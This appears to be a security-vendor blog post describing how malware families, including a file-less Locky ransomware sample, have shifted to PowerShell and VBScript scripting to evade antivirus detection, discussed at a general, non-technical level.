Malware have increasingly adopted scripts as a major technique, replacing file-based execution. This transition took place mainly to avoid signature-based detection employed by many security vendors. To understand how this is achieved, one must first understand what scripting really is.
Scripting languages are programs that support automated execution of tasks, which could be executed manually by a human operator. Scripting languages like PowerShell and VBScript were created to provide more flexible capabilities, adaptable to different needs, and are used mainly by administrators.
Activities such as victim recognition, lateral movement, C&C communication and persistence are very similar in nature to scripting actions used by admins, making it hard for protectors to differentiate between those regular benign network management activities and their malicious counterparts.
In the past year, malware in the wild have developed new implementations of scripting, making them the keystone of their operation. In our research, The Scripting Threat – Gaining Popularity, we followed this trend as it appeared in several different malware families.
In a gradual transition, scripting techniques were used by samples belonging to different malware families. They adopted scripting first as part of the reconnaissance stage, and later they were also used for persistency, privilege escalation, lateral movement, communication with C&C servers, and data exfiltration. Eventually, some malware became completely file-less, as demonstrated by the below file-less Locky Ransomware sample.
Locky Ransomware February 2016
There are a few causes for this trend – evasion, vast capabilities and time-to-market. Scripting helps malware evade detection. There are various techniques that allow malware to bypass defenses, including obfuscation, using legitimate processes to execute, and sandbox detection.
Today, scripting languages provide attackers with the same capabilities as file execution. In many cases, it is even easier when using scripting – shortening time-to-market. An attacker can even write a short script instead of developing a full scale file-base malware. The time difference between the two options could easily be a few days of work.
The last reason is the various difficulties security vendors face when dealing with scripts. These difficulties impair the protections capable of safeguarding against such threats. In fact, we have found that even new variants of known malware can evade most antivirus software with only a few minor adjustments.